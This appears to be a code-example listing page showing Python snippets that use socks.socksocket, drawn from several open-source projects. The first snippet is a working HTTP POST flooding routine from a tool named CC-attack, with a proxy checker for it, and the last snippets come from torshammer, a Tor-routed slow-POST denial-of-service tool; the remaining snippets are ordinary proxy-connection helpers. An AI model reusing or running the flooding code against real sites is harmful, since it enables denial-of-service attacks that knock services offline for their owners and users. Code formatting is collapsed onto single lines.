def post(event,socks_type): global data post_host = "POST " + url2 + " HTTP/1.1\r\nHost: " + ip + "\r\n" content = "Content-Type: application/x-www-form-urlencoded\r\n" refer = "Referer: http://"+ ip + url2 + "\r\n" user_agent = "User-Agent: " + random.choice(useragents) + "\r\n" accept = Choice(acceptall) if mode2 != "y": data = str(random._urandom(16)) # You can enable bring data in HTTP Header length = "Content-Length: "+str(len(data))+" \r\nConnection: Keep-Alive\r\n" if cookies != "": length += "Cookies: "+str(cookies)+"\r\n" request = post_host + accept + refer + content + user_agent + length + "\n" + data + "\r\n\r\n" proxy = Choice(proxies).strip().split(":") event.wait() while True: try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) if brute: s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) s.connect((str(ip), int(port))) if str(port) == '443': # //AUTO Enable SSL MODE :) ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=ip) try: for _ in range(multiple): s.sendall(str.encode(request)) except: s.close() print ("[*] Post Flooding from | "+str(proxy[0])+":"+str(proxy[1])) except: s.close()
Example #24
Source File: cc.py From CC-attack with GNU General Public License v2.0 | 5 votes |
def checking(lines,socks_type,ms):#Proxy checker coded by Leeon123 global nums global proxies proxy = lines.strip().split(":") if len(proxy) != 2: proxies.remove(lines) return err = 0 while True: if err == 3: proxies.remove(lines) break try: s = socks.socksocket() if socks_type == 4: s.set_proxy(socks.SOCKS4, str(proxy[0]), int(proxy[1])) if socks_type == 5: s.set_proxy(socks.SOCKS5, str(proxy[0]), int(proxy[1])) s.settimeout(ms) s.connect((str(ip), int(port))) if port == 443: ctx = ssl.SSLContext() s = ctx.wrap_socket(s,server_hostname=ip) s.send(str.encode("GET / HTTP/1.1\r\n\r\n")) s.close() break except: err +=1 nums += 1
Example #25
Source File: rawhttp.py From Saker with GNU General Public License v3.0 | 5 votes |
def setProxy(self, addr, port, username=None, password=None, proxy_type=socks.SOCKS5): # pip install PySocks import socks socks.set_default_proxy( proxy_type, addr=addr, port=port, username=username, password=password ) # socket.socket = socks.socksocket self.socket = socks.socksocket
Example #26
Source File: sockshandler.py From script.elementum.nova with Do What The F*ck You Want To Public License | 5 votes |
def connect(self): self.sock = socks.socksocket() self.sock.setproxy(*self.proxyargs) if type(self.timeout) in (int, float): self.sock.settimeout(self.timeout) self.sock.connect((self.host, self.port))
Example #27
Source File: sockshandler.py From script.elementum.nova with Do What The F*ck You Want To Public License | 5 votes |
def connect(self): sock = socks.socksocket() sock.setproxy(*self.proxyargs) if type(self.timeout) in (int, float): sock.settimeout(self.timeout) sock.connect((self.host, self.port)) self.sock = ssl.wrap_socket(sock, self.key_file, self.cert_file)
Example #28
Source File: utils.py From MoP with Apache License 2.0 | 5 votes |
def tcp_socket(): """Create new tcp socket with proxy support depends on configuration""" config = parse_config(os.path.join(os.path.dirname(__file__), '..', 'config.yaml')) use_proxy = 'proxy' in config and config['proxy']['use_proxy'] == True if use_proxy: s = socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, config['proxy']['ip'], config['proxy']['port'], True) return socks.socksocket() return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Example #29
Source File: torshammer.py From EasY_HaCk with Apache License 2.0 | 5 votes |
def __init__(self, host, port, tor): Thread.__init__(self) self.host = host self.port = port self.socks = socks.socksocket() self.tor = tor self.running = True
Example #30
Source File: torshammer.py From EasY_HaCk with Apache License 2.0 | 5 votes |
def run(self): while self.running: while self.running: try: if self.tor: self.socks.setproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050) self.socks.connect((self.host, self.port)) print term.BOL+term.UP+term.CLEAR_EOL+"Connected to host..."+ term.NORMAL break except Exception, e: if e.args[0] == 106 or e.args[0] == 60: break print term.BOL+term.UP+term.CLEAR_EOL+"Error connecting to host..."+ term.NORMAL time.sleep(1) continue while self.running: try: self._send_http_post() except Exception, e: if e.args[0] == 32 or e.args[0] == 104: print term.BOL+term.UP+term.CLEAR_EOL+"Thread broken, restarting..."+ term.NORMAL self.socks = socks.socksocket() break time.sleep(0.1) pass